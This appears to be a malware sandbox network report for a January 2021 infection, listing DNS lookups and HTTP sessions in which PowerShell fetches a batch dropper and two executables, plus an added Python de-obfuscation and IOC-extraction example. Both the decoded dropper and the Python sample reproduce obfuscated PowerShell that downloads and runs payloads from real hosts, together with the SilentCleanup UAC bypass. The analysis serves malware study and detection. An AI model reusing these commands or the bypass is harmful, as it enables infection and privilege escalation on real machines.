                                                                          Jan 6, 2021 09:57:57.845453978 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845495939 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845531940 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845571041 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845607042 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845643044 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845680952 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845717907 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845777035 CET8049170195.191.149.103192.168.2.22
                                                                          Jan 6, 2021 09:57:57.845818996 CET8049170195.191.149.103192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2021 09:57:47.724637032 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:57:47.786196947 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:57:48.403721094 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:57:48.461515903 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:57:48.464165926 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:57:48.511914015 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:57:57.448802948 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:57:57.538116932 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:59:02.518826962 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:59:02.602788925 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:59:02.603570938 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:59:02.659696102 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:59:14.369138956 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:59:14.425939083 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:59:15.571358919 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:59:15.676179886 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jan 6, 2021 09:59:15.676975965 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 6, 2021 09:59:15.733505964 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 6, 2021 09:57:47.724637032 CET | 192.168.2.22 | 8.8.8.8 | 0x8b6a | Standard query (0) | cutt.ly | A (IP address) | IN (0x0001)
Jan 6, 2021 09:57:57.448802948 CET | 192.168.2.22 | 8.8.8.8 | 0xc5ac | Standard query (0) | gtp.bg | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:02.518826962 CET | 192.168.2.22 | 8.8.8.8 | 0xae50 | Standard query (0) | gtp.bg | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:02.603570938 CET | 192.168.2.22 | 8.8.8.8 | 0xae50 | Standard query (0) | gtp.bg | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:14.369138956 CET | 192.168.2.22 | 8.8.8.8 | 0x1e90 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:15.571358919 CET | 192.168.2.22 | 8.8.8.8 | 0xd1e7 | Standard query (0) | yz.videomarket.eu | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:15.676975965 CET | 192.168.2.22 | 8.8.8.8 | 0xd1e7 | Standard query (0) | yz.videomarket.eu | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 6, 2021 09:57:47.786196947 CET | 8.8.8.8 | 192.168.2.22 | 0x8b6a | No error (0) | cutt.ly |  | 172.67.8.238 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:57:47.786196947 CET | 8.8.8.8 | 192.168.2.22 | 0x8b6a | No error (0) | cutt.ly |  | 104.22.0.232 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:57:47.786196947 CET | 8.8.8.8 | 192.168.2.22 | 0x8b6a | No error (0) | cutt.ly |  | 104.22.1.232 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:57:57.538116932 CET | 8.8.8.8 | 192.168.2.22 | 0xc5ac | No error (0) | gtp.bg |  | 195.191.149.103 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:02.602788925 CET | 8.8.8.8 | 192.168.2.22 | 0xae50 | No error (0) | gtp.bg |  | 195.191.149.103 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:02.659696102 CET | 8.8.8.8 | 192.168.2.22 | 0xae50 | No error (0) | gtp.bg |  | 195.191.149.103 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:14.425939083 CET | 8.8.8.8 | 192.168.2.22 | 0x1e90 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:15.676179886 CET | 8.8.8.8 | 192.168.2.22 | 0xd1e7 | No error (0) | yz.videomarket.eu |  | 185.157.162.81 | A (IP address) | IN (0x0001)
Jan 6, 2021 09:59:15.733505964 CET | 8.8.8.8 | 192.168.2.22 | 0xd1e7 | No error (0) | yz.videomarket.eu |  | 185.157.162.81 | A (IP address) | IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • 37.46.150.139
                                                                          • gtp.bg
                                                                          • ip-api.com

                                                                          HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49169 | 37.46.150.139 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 09:57:49.843473911 CET | 72 | OUT | GET /bat/scriptxls_db309dc0-6a94-419d-8933-c37781a53f80_mic2_wddisabler.bat HTTP/1.1
Host: 37.46.150.139
Connection: Keep-Alive
Jan 6, 2021 09:57:49.893141031 CET | 73 | IN | HTTP/1.1 200 OK
Date: Wed, 06 Jan 2021 08:57:49 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12
Last-Modified: Wed, 06 Jan 2021 00:16:11 GMT
ETag: "926-5b8303afc5750"
Accept-Ranges: bytes
Content-Length: 2342
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
                                                                          Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 74 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 6f 6b 2e 62 61 74 3b 20 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 67 74 70 2e 62 67 2f 6f 70 6b 61 2f 69 6f 70 64 2f 7a 74 79 68 2f 6e 6d 6b 2f 31 76 72 6b 59 32 4f 4d 51 66 63 66 42 67 78 2e 65 78 65 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 73 70 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 73 70 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 
72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 74 27 29 3b 53 74 61 72 74 2d 53 6c
Data Ascii (line breaks restored from the 0d 0a bytes in Data Raw; the sandbox truncates the dump after "Start-Sl"):
    mode 18,1
    color FE
    setlocal
    for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j
    if "%version%" == "10.0" ( echo "Windows 10 detected"
    reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'  +   'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',($env:appdata)+'\sp.exe');Start-Sleep 2; Start-Process $env:appdata\sp.exe;&REM " >nul
    timeout /t 2 >nul
    schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul
    timeout /t 3 >nul
    reg delete "HKCU\Environment" /v "windir" /F
    )
    if "%version%" == "6.3" ( echo "Windows 8.1 detected"
    reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'  +   'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sl
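The wddisabler.bat dropper that powershell.exe fetched in session 0 reaches the reader only as a hex dump plus a run-on ASCII rendering, and the script itself is written to defeat a casual grep: "powershell" is split with cmd carets (p^owersh^el^l), the cmdlet name is split with PowerShell backticks (nEw-oBje`cT), and the first download URL is assembled from two literals ('ht' + 'tps://rebrand.ly/FBobfu') so that no "https://" ever appears in the bytes. The registry steps around it are the known SilentCleanup UAC bypass: the Microsoft\Windows\DiskCleanup\SilentCleanup task runs at highest privileges and its action is built from %windir%, which HKCU\Environment can redefine for the current user; the script sets that value to a cmd/powershell launcher, starts the task with schtasks, then deletes the value. The Python below is an added example and not part of the Joe Sandbox report: it rebuilds the script's lines from a Data Raw dump, undoes those three evasions, extracts the URLs and flags the windir/SilentCleanup sequence. SAMPLE_SCRIPT is a constructed, shortened stand-in for the dropper (same patterns, far fewer bytes); only REPORT_HEX_PREFIX is copied verbatim from the report's Data Raw. All function names are the example's own.

```python
import re

# Constructed sample (NOT the report's full script): a shortened stand-in
# for the wddisabler.bat dropper from HTTP session 0. It keeps the patterns
# the parser has to cope with: cmd caret-splitting of "powershell",
# PowerShell backtick-splitting of cmdlet names, the 'ht' + 'tps://' string
# concatenation, and the HKCU\Environment "windir" -> SilentCleanup ->
# reg delete sequence. SAMPLE_HEX is generated from it in the same
# "xx xx xx" layout the report uses for Data Raw.
SAMPLE_SCRIPT = (
    "mode 18,1\r\ncolor FE\r\nsetlocal\r\n"
    'reg add "HKCU\\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 '
    "(nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht'  +   'tps://rebrand.ly/FBobfu'),"
    "($env:appdata)+'\\ok.bat');Start-Process $env:appdata\\ok.bat;"
    "(New-Object Net.WebClient).DownloadFile('http://gtp.bg/opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe',"
    "($env:appdata)+'\\sp.exe')\" >nul\r\n"
    "schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I >nul\r\n"
    'reg delete "HKCU\\Environment" /v "windir" /F\r\n'
)
SAMPLE_HEX = " ".join(f"{b:02x}" for b in SAMPLE_SCRIPT.encode("cp1252"))

# The first 37 bytes of the report's own Data Raw for session 0, verbatim.
REPORT_HEX_PREFIX = (
    "6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a "
    "73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66"
)


def decode_hex_dump(hex_text: str, encoding: str = "cp1252") -> list[str]:
    """Rebuild the dropped file's lines from a Joe Sandbox 'Data Raw' dump.

    The report's 'Data Ascii' view drops the 0d 0a bytes, which is why the
    batch file reads as one run-on line there. The sandbox also truncates
    long dumps, so a dangling single-digit token at the end is ignored
    rather than raising.
    """
    tokens = [t for t in hex_text.split() if len(t) == 2]
    text = bytes(int(t, 16) for t in tokens).decode(encoding, errors="replace")
    lines = text.replace("\r\n", "\n").split("\n")
    if lines and lines[-1] == "":  # file ended with CRLF
        lines.pop()
    return lines


_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def normalize(line: str) -> str:
    """Undo the script's cheap obfuscation so plain IOC regexes match again.

    - cmd.exe treats ^ as an escape, so p^owersh^el^l runs powershell.
    - PowerShell accepts backticks inside bare words: nEw-oBje`cT -> New-Object.
    - 'ht' + 'tps://...' hides the URL from a naive http(s):// search; fold
      adjacent literals until nothing changes so a + b + c chains fold too.
    This is an IOC-extraction normalization, not an interpreter: a backtick
    escape inside a double-quoted PowerShell string (`n) would be mangled.
    """
    line = line.replace("^", "").replace("`", "")
    while True:
        folded = _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", line)
        if folded == line:
            return line
        line = folded


_URL = re.compile(r"""https?://[^\s'"<>)]+""")


def extract_urls(lines: list[str]) -> list[str]:
    """Unique URLs in first-seen order, after de-obfuscation."""
    seen: list[str] = []
    for line in lines:
        for url in _URL.findall(normalize(line)):
            if url not in seen:
                seen.append(url)
    return seen


def uac_bypass_indicators(lines: list[str]) -> dict[str, bool]:
    """Flag the windir/SilentCleanup sequence used by the dropper.

    Microsoft\\Windows\\DiskCleanup\\SilentCleanup runs at highest privileges
    and its action is built from %windir%, which a standard user can redefine
    under HKCU\\Environment. The script points windir at a cmd/powershell
    launcher, fires the task, then deletes the value to remove the trace.
    """
    text = "\n".join(normalize(ln) for ln in lines).casefold()
    return {
        "launches_powershell": "powershell" in text,
        "windir_env_hijack": bool(re.search(r'reg add\s+"hkcu\\environment"\s+/v\s+"windir"', text)),
        "silentcleanup_triggered": bool(re.search(r"schtasks\s+/run\s+.*silentcleanup", text)),
        "trace_removed": bool(re.search(r'reg delete\s+"hkcu\\environment"\s+/v\s+"windir"', text)),
    }


if __name__ == "__main__":
    recovered = decode_hex_dump(SAMPLE_HEX)
    print("\n".join(recovered))
    print("URLs:", extract_urls(recovered))
    print("Indicators:", uac_bypass_indicators(recovered))
```

Run against the report itself by pasting the full Data Raw string from session 0 into decode_hex_dump; the raw lines will not contain "https://rebrand.ly" or "powershell" at all, which is exactly why string-based YARA or proxy rules need the normalize step before matching. A dump that the sandbox cut mid-byte decodes to the complete bytes before the cut rather than failing.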


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49170 | 195.191.149.103 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 09:57:57.626811028 CET | 75 | OUT | GET /opka/iopd/ztyh/nmk/1vrkY2OMQfcfBgx.exe HTTP/1.1
Host: gtp.bg
Connection: Keep-Alive
Jan 6, 2021 09:57:57.699496031 CET | 76 | IN | HTTP/1.1 200 OK
Date: Wed, 06 Jan 2021 08:57:59 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Wed, 06 Jan 2021 00:13:34 GMT
ETag: "53b13c0-42e600-5b83031a39cfd"
Accept-Ranges: bytes
Content-Length: 4384256
Keep-Alive: timeout=3, max=100
Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6f ff f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 da 42 00 00 0a 00 00 00 00 00 00 de f8 42 00 00 20 00 00 00 00 43 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 43 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c f8 42 00 4f 00 00 00 00 00 43 00 30 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 43 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 d8 42 00 00 20 00 00 00 da 42 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 30 06 00 00 00 00 43 00 00 08 00 00 00 dc 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 43 00 00 02 00 00 00 e4 42 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 f8 42 00 00 00 00 00 48 00 00 00 02 00 05 00 20 9c 00 00 54 4f 03 00 03 00 00 00 4d 01 00 06 74 eb 03 00 18 0d 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 dd 00 00 00 01 00 00 11 00 d0 02 00 00 02 28 16 00 00 0a 28 17 00 00 0a 6f 18 00 00 0a 28 19 00 00 0a 72 01 00 00 70 28 1a 00 
00 0a 0a 72 05 00 00 70 20 10 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0b 07 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 0c 08 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 39 00 00 70 20 11 27 00 00 06 72 19 00 00 70 73 06 00 00 06 0d 09 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 04 11 04 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 72 4d 00 00 70 20 12 27 00 00 06 72 19 00 00 70 73 06 00 00 06 13 05 11 05 25 fe 07 03 00 00 06 73 1b 00 00 0a 73 1c 00 00 0a 13 06 11 06 6f 1d 00 00 0a 00 20 e8 03 00 00 28 1e 00 00 0a 00 2a 22 02 28 1f 00 00 0a 00 2a 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 14 0a 2b 00 06 2a 00 13 30 06 00 73 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 73 21 00 00 0a 7d 05 00 00 04 02 03 28 07 00 00 06 00 02 02 7b 01 00 00 04 73 11 00 00 06 7d 08 00 00 04 02 02 7b 01 00 00 04 02 7b 08 00 00 04 02 7b 05 00 00 04 73 26 00 00 06 7d 0a 00 00 04 02 02 7b 01 00 00 04 02 7b 02 00 00 04 02 7b 08 00 00 04 02 7b 0a 00 00 04 02 7b 05 00 00 04 73 19 00 00 06 7d 09 00 00 04 2a 00 13 30 06 00 9a 00 00 00 00 00 00 00 02 28 20 00 00 0a 00 00 02 03 7d 01 00 00 04 02 04
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELo_0BB C@ @C@BOC0 C H.textB B `.rsrc0CB@@.reloc CB@BBH TOMt?0((o(rp(rp 'rps%sso (r9p 'rps%sso (rMp 'rps%sso (*"(*0+*0s( s!}({s}{{{s&}{{{{{s}*0( }


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49175 | 195.191.149.103 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | kBytes transferred | Direction | Data
Jan 6, 2021 09:59:02.751955032 CET | 4687 | OUT | GET /opkl/fioli/zplk/apo/5DVxvgK9jn5gaBl.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: gtp.bg
Connection: Keep-Alive
Jan 6, 2021 09:59:02.824470043 CET | 4689 | IN | HTTP/1.1 200 OK
Date: Wed, 06 Jan 2021 08:59:04 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 05 Jan 2021 13:10:58 GMT
ETag: "53b28b5-db800-5b826effab56e"
Accept-Ranges: bytes
Content-Length: 899072
Keep-Alive: timeout=3, max=100
Content-Type: application/x-msdownload
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 64 f4 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a2 0d 00 00 14 00 00 00 00 00 00 6e c1 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 18 c1 0d 00 53 00 00 00 00 e0 0d 00 80 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 74 a1 0d 00 00 20 00 00 00 a2 0d 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 11 00 00 00 e0 0d 00 00 12 00 00 00 a4 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 0e 00 00 02 00 00 00 b6 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 c1 0d 00 00 00 00 00 48 00 00 00 02 00 05 00 80 e2 0c 00 98 de 00 00 03 00 00 00 3d 01 00 06 30 11 01 00 50 d1 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 fa 57 44 5e 53 5c 60 f0 ba 5d aa 34 1f 5f fc 78 97 96 76 c7 e2 85 3f 29 30 6f 15 01 38 c6 b1 55 5f 60 b9 df cc dd 8d fd ef de c9 d4 49 
af a6 50 83 13 2b 0b 7d c7 92 a5 bc 81 aa 4b b3 67 43 ed d4 0e ab 8d 4c c5 1b 17 46 62 b4 cf 94 ea bc 5f 3c 79 08 b9 a4 b6 4b 46 d4 b0 93 61 21 66 e6 e6 4f 5b 5f d9 3f 60 a7 67 76 6c 82 30 87 05 c3 86 9b 46 b3 c6 00 0c b2 9d 28 0f 9d 0b b8 33 5f d2 68 ee 34 a2 37 57 5f e5 22 c7 0d b1 cd fe f9 37 e4 64 cb 8f 6e 44 c5 42 ee 3b 0c e4 7d 91 69 fa 2f 8b 43 1f cf 1e 4f ea 3a b8 5c 9b 53 01 11 37 7d 1e 82 83 67 40 ad f3 46 4a a8 a1 60 36 21 1d 95 50 e9 7e ea a5 2c 08 29 f2 aa a4 67 46 a6 1f 4f 77 ac cb 13 ec 97 d4 9f 72 b5 08 37 79 45 ea 51 d6 e5 aa a5 f9 db d2 be 89 a5 51 ec 41 23 ea 8b c9 21 28 a4 18 4d 1e c0 c7 50 ed 80 ca 85 2e 9a 27 62 5c ea 5c 80 f1 da 53 f7 16 98 68 5c a6 b9 24 15 71 50 89 c9 80 6f 56 17 62 3a 9d 27 da 21 a0 53 6e 91 da 71 c2 3e 2c 67 a2 db 19 dc 78 9e 90 4d 60 60 e8 11 dd 53 bb 13 0d da 91 cd 52 b9 4f d1 93 ae 5a 77 70 40 29 a0 91 a0 e0 ea f0 20 52 ab ac d6 c3 c8 2f 45 61 3d e9 bd 92 60 74 b6 7d 68 b3 d1 a5 a9 de 96 fc 7d 62 5a d9 e4 2e 50 0c 26 35 53 97 15 cc e0 d1 cc ba a4 a2 bf 66 64 d0 7c bc ee 95 8f b1 2c 80 15 b5 f9 91 9e f6 11 d2 9a 58 4d 91 9e 88 a7 12 5c cc 38 5a 6c 6f 31 e7 6e bb b3 a3
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELd_0n @ @S H.textt `.rsrc@@.reloc@BPH=0PpWD^S\`]4_xv?)0o8U_`IP+}KgCLFb_<yKFa!fO[_?`gvl0F(3_h47W_"7dnDB;}i/CO:\S7}g@FJ`6!P~,)gFOwr7yEQQA#!(MP.'b\\Sh\$qPoVb:'!Snq>,gxM``SROZwp@) R/Ea=`t}h}bZ.P&5Sfd|,XM\8Zlo1n


